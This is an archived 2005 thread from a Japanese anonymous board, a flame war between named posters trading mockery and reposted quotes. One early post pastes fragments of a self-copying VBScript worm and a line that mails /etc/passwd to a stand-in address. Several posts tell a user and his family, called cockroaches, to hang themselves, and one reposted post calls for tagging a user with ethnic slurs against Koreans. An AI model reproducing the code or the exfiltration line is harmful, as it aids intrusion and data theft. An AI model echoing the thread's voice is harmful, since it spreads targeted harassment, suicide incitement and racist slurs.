5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

史上最大の決戦! 奉 先 VSへたれ悦司対名無し

1 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:45:30

狂乱遊戯Z / 俺は40板の「自演ヘタレ」である。
http://bubble3.2ch.net/test/read.cgi/cafe40/1115997703/l50

【ゲラ】 疑心暗鬼様のつく確実なるウソ 【ゲラ】
http://bubble3.2ch.net/test/read.cgi/cafe40/1116129254/l50

2 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:45:48
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"




3 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:47:10
どうでもいいよ

4 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:47:25
馬鹿同士の小競り合いも、傍から見ていたら何気に楽しい罠♪♪

5 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:51:54
楽しいね♪

91 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/15(日) 23:25:19

>>90
そうか??ニヤニヤ
種明かしは、しばらく後だ ゲラ


このしばらくは、仙台ババアを泳がせた方が面白い ニヤニヤ

303 :へたれ悦司対名無し ◆G3pfVIQ4d. :2005/05/15(日) 23:38:07


>種明かしは、しばらく後だ ゲラ


メールと同じで「しばらく」に逃げ
間違いなく実行に移さないでしょう・・・



だって嘘だしね♪



ちなみに奉先の脳内では「嘘」=「策略」と
都合よく転化してるらしいですけど・・・



ゲラゲラゲラゲラゲラ

6 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:00:59
324 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:57:28
土日で2ちゃん40時間の気違い

325 :名無しさん@お腹いっぱい。:2005/05/15(日) 23:58:13
仙台在外

---------------------------------------------------------------
104 名前:名無しさん@お腹いっぱい。 :2005/05/15(日) 23:42:57
>>101

お得意の疑心暗鬼ですか? ww

106 名前:名無しさん@お腹いっぱい。 :2005/05/15(日) 23:44:28

了見が狭い男だな ww

107 名前:名無しさん@お腹いっぱい。 :2005/05/15(日) 23:45:19
お前の一生が見て取れるわ

109 名前:名無しさん@お腹いっぱい。 :2005/05/15(日) 23:46:32

疑心暗鬼を抱いてあの世に逝け www

7 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:06:12
>>1 悦死〜〜! 糞スレ立て乙 ww

8 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:06:38
268 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/15(日) 18:43:15
裏仙台、親もゴキブリか?
269 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/15(日) 18:44:09
裏仙台、お前の家族もゴキブリか
270 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/15(日) 18:44:29
ネタ枯れwww
271 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/15(日) 18:45:14
裏仙台、ゴキブリ一家恥晒し一家なのか
272 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/15(日) 18:46:07
裏仙台、ゴキブリ一家全員で首吊って死ぬよ

----------------------------------------------------------------

114 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:01:05

>>111

またまた疑心暗鬼か? 
裁量の狭い男だな まったく
お前を好かんのは 対名無し だけじゃないことはお前が一番よく分かっているはず ww

9 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:23:23
111 :奉 先 ◆Ryohu/B1sc :2005/05/15(日) 23:49:19
>>109
レスが短いが、お前は仙台ババアか??
まぁ、名無し相手の孤軍奮闘を経験するのも
一つの教訓にはなろう ゲラ

113 :奉 先 ◆Ryohu/B1sc :2005/05/15(日) 23:58:10

オイオイ、仙台ババアは、今は悦司その他のコテと対峙しているのではなく
オレと対峙しているのだから
その立場での仙台ババアを励ましてやってくれ ニヤニヤ

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

327 名前: へたれ悦司対名無し ◆G3pfVIQ4d. 投稿日: 2005/05/15(日) 23:59:58
疑心暗鬼のカオス板などと嘯くのなら

オレに実際会えなどと
ヘタレのくせに出来もしないリアルを持ち出す時点で失敗だな♪


軍団の長なのに
手下と同じ失敗で共倒れとは・・・



明るい話題を振り撒いて
三国志片手にタイプ打つ

蝉ババちょっとそれ取って
悦司このレスどうかしら

時にはしくじる事もある
ちょっぴり悲しい事もある

だけど・・・
んんだけど・・・

明るい私は
明るい私は

奉先さん♪



・・・こんな感じの策士を慕う気持ちって一体

ゲラゲラゲラゲラゲラゲラゲラ

10 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:31:32
結局は同族嫌悪のエンドレス・ウォーですね

11 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:38:03
354 :へたれ悦司対名無し ◆G3pfVIQ4d. :2005/05/16(月) 00:34:33

あれあれ?

悦司軍団の師匠はお疲れモードで
纏め単レス返しになってるぞ?

手下のアホ悦と麻キティが頑張んなきゃね♪

偶には師匠を助けるくらいの気概を持てよ
疑心暗鬼で自演無差別攻撃は分かったから

さぁヘタレの意地を見せてみろよ♪

ゲラゲラゲラゲラゲラゲラゲラ

12 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:38:44
120 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/16(月) 00:14:05

>>118
それよりも、仙台ババアに聞け

123 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/16(月) 00:25:46

仙台ババアは、40板以外には出ないヒッキーらしい プ

>>117
あまり問題ではない。

>>119
そんなに嫌いなのか??
オレも、梅退治のときには、彼らとも対立したものだが…
人間は、そう憎むものではない。

……と、人間嫌いのオレが言う ゲラ

>>120 補足
香具師は、名無しの質問には何も回答できまい ニヤ

>>121
ムキになるな。

124 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/16(月) 00:33:01

無駄かも知れぬが、これをもう一度張っておくか。
疑心暗鬼は、このスレだけで良かろう ゲラ


113 :奉 先 ◆Ryohu/B1sc :2005/05/15(日) 23:58:10

オイオイ、仙台ババアは、今は悦司その他のコテと対峙しているのではなく
オレと対峙しているのだから
その立場での仙台ババアを励ましてやってくれ ニヤニヤ

126 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/16(月) 00:35:26

>>125
古典的なオウム返しか??

さて、そろそろ他板でも覗くか………

13 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:53:29
357 名前: へたれ悦司対名無し ◆G3pfVIQ4d. 投稿日: 2005/05/16(月) 00:42:16

踊り疲れた悦司軍団♪

っていうか・・・

正直煽っていながらも
自分で自分を罵倒している事に気付けたのか?


アホの集合体だから
そんな訳ないか♪



プッ・・・ゲラゲラゲラゲラゲラゲラゲラ

360 名前: へたれ悦司対名無し ◆G3pfVIQ4d. 投稿日: 2005/05/16(月) 00:51:36


うわぁ・・・

露骨に尻すぼみ♪


師匠にどうすればイイのか
相談してこい


命令だぞ


ゲラゲラゲラゲラゲラゲラ

14 :名無しさん@お腹いっぱい。:2005/05/16(月) 00:54:00
128 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/16(月) 00:46:58

仙台ババアに敵対する名無しは
すべからくオレ様の配下か、悦司軍団なのだそうだ プ

オレ様は配下を持たない。
紳士的なマジレスをする名無しやコテとは
対等に接しているつもりだが……

「目には目、歯には歯」
以前から繰り返していることである。

129 名前: 奉 先 ◆Ryohu/B1sc [晒しage祭り] 投稿日: 2005/05/16(月) 00:50:24

どうやら、仙台ババアは詭弁に逃げ始めたようだ。
名無しの煽りが応えているようだな……ニヤニヤ

15 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:02:38
130 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 00:57:18
>>128

これこそ詭弁。いつも自分から仕掛けて構って貰う痴呆先のくせに。
131 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 01:00:50
>>130
そうそう、元々は仙台男が糞悦に絡んでたところを
阿呆先がでしゃばってきただけのこと。
よっぽど悦VS仙台が羨ましかったんだろう。

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

361 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 00:53:14
↑そうでしょ♪ゴキブリわかったあ?ギャハハハハ
362 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 00:55:07
仕事もなく
363 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 00:55:36
ゴキブリは朝まで
364 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 00:56:14
2ちゃん三昧♪ギャハハハハ
365 名前: 名無しさん@お腹いっぱい。 投稿日: 2005/05/16(月) 01:01:42


愛着のある嫌われコテを使えなくなり

2チャン三昧が出来なくなって悔しいのか?


でも
その単調煽りで這いずり回る方が
オマエのリアルと同じでお似合いだよ♪



ゲラゲラゲラゲラゲラゲラ

16 :悦先:2005/05/16(月) 01:34:55
オイおめ〜ら、もっと盛り上げろ!

17 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:48:19
悦先ワラ

18 :悦先:2005/05/16(月) 01:50:22
日本ハムの、シャ〜ウ悦先

19 :名無しさん@お腹いっぱい。:2005/05/16(月) 01:52:39
まともなコテを名乗れなくなり

2チャン三昧が出来なくなって悔しいのか?


でも
その単調煽りで這いずり回る方が
ゴキブリのリアルと同じでお似合いだよ♪



ゲラゲラゲラゲラゲラゲラ

20 :悦先:2005/05/16(月) 08:17:22
なんだ まだ決着ついてねえのか プゲラ

中途半端はいけねえな。。

21 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:25:58
目障りなんでsage進行でやってくれませんか?バカども。

22 :名無しさん@お腹いっぱい。:2005/05/16(月) 08:27:05
人参

23 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:17:29


24 :名無しさん@お腹いっぱい。:2005/05/16(月) 10:24:26
周辺

25 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:33:26
で?決着とやらはどうなったんだよ??

26 :悦先:2005/05/17(火) 23:11:20
>>25
まだ〃決着はついてはおらぬ。

レベルが拮抗しており、甲乙つけ難いのぢゃ。

27 :名無しさん@お腹いっぱい。:2005/05/18(水) 00:20:13
なにが面白いの?チミタチ

28 :名無しさん@お腹いっぱい。:2005/05/18(水) 09:53:53
200 :野球 十兵衛 ◆Ryohu/B1sc :2005/05/17(火) 12:47:42

>>191
悦司と麻木は面識があるようだが
悦司とのりは、面識はあるのか??
ないならば、親交度は麻木と悦司の方が深いのだろう。
それをのりがどう思うかは知らん。
連中のやりとりを逐一見ていないので分からんが
例えば、のりが嫉妬に狂って麻木と悦司に名無し粘着した結果
悦司が怒って、証拠もなく居酒屋スレその他で
のり組やそのシンパを指弾したことから
関係がより悪化したという図式も考えられるのだろう??
その際に、仙台ババアが義憤にかられて
悦司粘着を始めたのかも知れないし
あるいは、のりシンパが盲目的に攻撃しているのかも知れない。

また、本当にのりがそれをしたかどうかは知らんが
現実には旧30代以上板で、名無し煽りをしていた前例もあるのだから
今回についても、可能性が皆無とも言い切れまい。
どちらにしろ、ROMだけでは検証がし切れないカオス板では、
否定も肯定もできない。
だからこそ、妄想で断定することもできれば、
誤魔化して否定することもできる。
そうした、あらぬ疑いをかけられても
晴らすことのできない疑心暗鬼状態を毛嫌いして、
連中は30板に避難したのではないのか??

29 :名無しさん@お腹いっぱい。:2005/05/18(水) 09:55:30
>>28
マルチ馬鹿ハケーン!


30 :名無しさん@お腹いっぱい。:2005/05/18(水) 10:30:18
わかんねー

31 :名無しさん@お腹いっぱい。:2005/05/20(金) 00:55:00
基地外奉先の新クソスレ(藁

【許して】疑心暗鬼で自分と喧嘩【仙台ババァ】
http://bubble3.2ch.net/test/read.cgi/cafe40/1116514811/

32 :名無しさん@お腹いっぱい。:2005/05/20(金) 00:58:50
>>31
テラワロ-ス(*´Д`)ハァハァ八ァ八ァノヽアノヽアノヽアノ \ア / \ア/ \ア


33 :名無しさん@お腹いっぱい。:2005/05/23(月) 22:12:13
こっちは 糸冬 了 なのかよ? ゲラゲラ

34 :貂蝉 ◆BKUQaRbNV. :2005/05/23(月) 23:38:49
一人じゃ手がまわらないってさ。p

35 :貂蝉 ◆DEVIL/FIak :2005/05/31(火) 07:06:52

ババアじゃ老体が続かないってさ p

36 :名無しさん@お腹いっぱい。:2005/05/31(火) 20:33:51
                                /\
                    ,ヘ、          .|  \
          /\ __    /  |          .|    ヽ /\
         / / ̄\  \  /    |          |     ヽ´   \
       / /    \  \    |          |    /ヽ    \
      / /       \/ .|    | カサカサ    .|   /  ヽ  ___\__
     /  /        /\ .|   |   _    |   /   ヽ/     \  ヽ
    /  /        |   ヽ|   | /._.. ヽ  .|  /   /        \  ヽ
    /  |         |   | |   /.._.. ヽ... ヽ .|  /  /  |         \ ヽ
   /   |         |   | \ /... ...ヽ |.. )| /  ./    |          \|
  /    |         |   |  ヽ● ● 丿ノ |/  /     |           |\
 /    /         ノ   \  /V""V"\ヽ、//        |          |  |
./  _/              \/  )/ /||\_/         ゝ          |  |
|                       Λ( Λ〃/                       <  |
|                       ( "" /                          |
                        """"




37 :名無しさん@お腹いっぱい。:2005/06/01(水) 22:13:34
掃除汁♪

38 :名無しさん@お腹いっぱい。:2005/06/06(月) 21:37:12
age

39 :名無しさん@お腹いっぱい。:2005/06/06(月) 22:56:44


290 :奉 先 ◆Ryohu/B1sc :04/09/22 17:47:20

悦司の自作自演は、糞梅の自作自演とうり二つ。
他板で、複数の♀コテを自演しながら
いかにもモテているかのように演出をしているスレを
見たことがある。
かつて、フェチ板出身と糞梅が自白していたが
レス内容から見て、その趣味・性情も一致している。




40 :ルポライター ◆DEVIL/FIak :2005/06/06(月) 23:08:13

呼んだか、馬鹿奉先 プ

41 :名無しさん@お腹いっぱい。:2005/06/06(月) 23:24:23
掃除age

42 :名無しさん@お腹いっぱい。:2005/06/07(火) 11:52:52
逃げてるし

43 :奉 先 ◆DEVIL/FIak :2005/06/11(土) 09:06:58
貧乏暇無のオレ様には深刻なテーマなのだがな

【省エネ】何を着れば良いのだ??【ノーネクタイ】
http://bubble3.2ch.net/test/read.cgi/cafe40/1118444427/

44 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:09:45
アウト

45 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:21:04
セーフ

46 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:22:07
チェンジ

47 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:23:04
ゲームセット

48 :名無しさん@お腹いっぱい。:2005/06/11(土) 12:24:11
ヨヨイノヨイ

49 :名無しさん@お腹いっぱい。:2005/06/12(日) 18:52:17





ピアゴラスって何ですか?













50 :名無しさん@お腹いっぱい。:2005/06/14(火) 19:46:53
/
80 :(。・ヮ・)大根 ◆2MSGTd1hpM :2005/06/10(金) 21:10:07
あー ちょっとちょっと
皆さんよろしいでしょうか
「悦死」を日本一の劣った生き物として認定するために布教活動をしている者です

皆さんも是非ご協力をお願いいたします

「えつし」という単語を使うときは必ず
「下等」「粘着」「虫けら」「朝鮮人」「チョン」「高慢」「掃き溜め」「陰湿」
などの単語を交えてレスしてください

どんなに頑張っても他の地域の人はスルーしてつまらないのですが
「悦死」だけは文字通り「粘着」「陰湿」「高慢」「学習能力ゼロ」なので
必ず反応して釣り上がって来ます
やめられない遊びを楽しみませう ぷぅ〜

「いつなんどきも悦死に不愉快を」

が合言葉です


51 :名無しさん@お腹いっぱい。:2005/06/15(水) 01:29:32

604 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/14(火) 22:47:50
   >>599
   あれ?
   俺は支店長だと言うのを知らなかったのか?
   まぁどこの会社とは言えないけどな。

655 :名無しさん@お腹いっぱい。:2005/06/14(火) 23:43:02
   支店長つうのはホント?

658 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/14(火) 23:46:37
   >>655
   これは事実だ。
   それ以上の事は言えん。

650 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/14(火) 23:33:59
   しかし、君たちには支店長という重責が理解出来ないだろうな。
   君たちのように何も考えないのもたまに羨ましく思えるぞ。
   わはははははは・・・・・。

        支店長 → のようなもの

661 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/14(火) 23:54:22
   まぁ正確に言えば支店長のようなものだ。

     のようなもの → それなりに

665 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/15(水) 00:03:18
   >>663
   それなりに権限があるという事だ。

      それなりに → 数年後には

679 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/15(水) 00:24:06
   >>676
   数年後にはそうなっておる。
   まぁそれまでの楽しみにしておいてくれ。

      数年後には → 訂正

690 :佐藤イチロー ◆Kyq6tPsFIE :2005/06/15(水) 00:35:46
   >>687
   俺は支店長でないことは以前、悦司にばらされておる。
   だから訂正したのだ。
 \ 俺の役職もすでに悦司が公表しておる。
   ̄ ̄ ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄
           ___                _
       / ____ヽ           /  ̄   ̄ \
       |  | /, −、, -、l           /、          ヽ  おまえ生きてて恥ずかしくないか?
       | _| -|○ | ○||         |・ |―-、       |   
   , ―-、 (6  _ー っ-´、}         q -´ 二 ヽ      |
   | -⊂) \ ヽ_  ̄ ̄ノノ          ノ_ ー  |     |
    | ̄ ̄|/ (_ ∪ ̄ / 、 \        \. ̄`  |      /
    ヽ  ` ,.|     ̄  |  |         O===== |
      `− ´ |  悦   | _|        /          |


52 :名無しさん@お腹いっぱい。:2005/06/22(水) 23:46:24
保守コピペw 
しっかしよく言うよな 呆

296 名前: 奉 先 ◆DEVIL/FIak 投稿日: 03/12/25 17:57

オイオイ、お前ら勘違いをするな。
オレは誰にも構ってくれなどと頼んだ覚えはない。
むしろ逆だろう。
このスレは、一体誰が何のために立てたのだ??
オレと煽り合いをしたいからではないか?
つまりは、オレ様に構って欲しい心情の証しではないかw
だから、おもしろ半分に煽りやすそうなネタを
いろいろと提供してきたのに、構って欲しいと思われたなら
オレはいつだって他板に移るぞ ゲラ

オレ自身は、自スレや巡回先は他にあるのだ。

53 :奉 先 ◆Ryohu/B1sc :2005/06/23(木) 07:30:24

>>52
お前がな ペッ!
オレ様が見切りを付けようとしたとき、
過去に何があったか覚えているか??ゲラ


54 :名無しさん@お腹いっぱい。:2005/06/23(木) 08:52:57
あほか!!

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)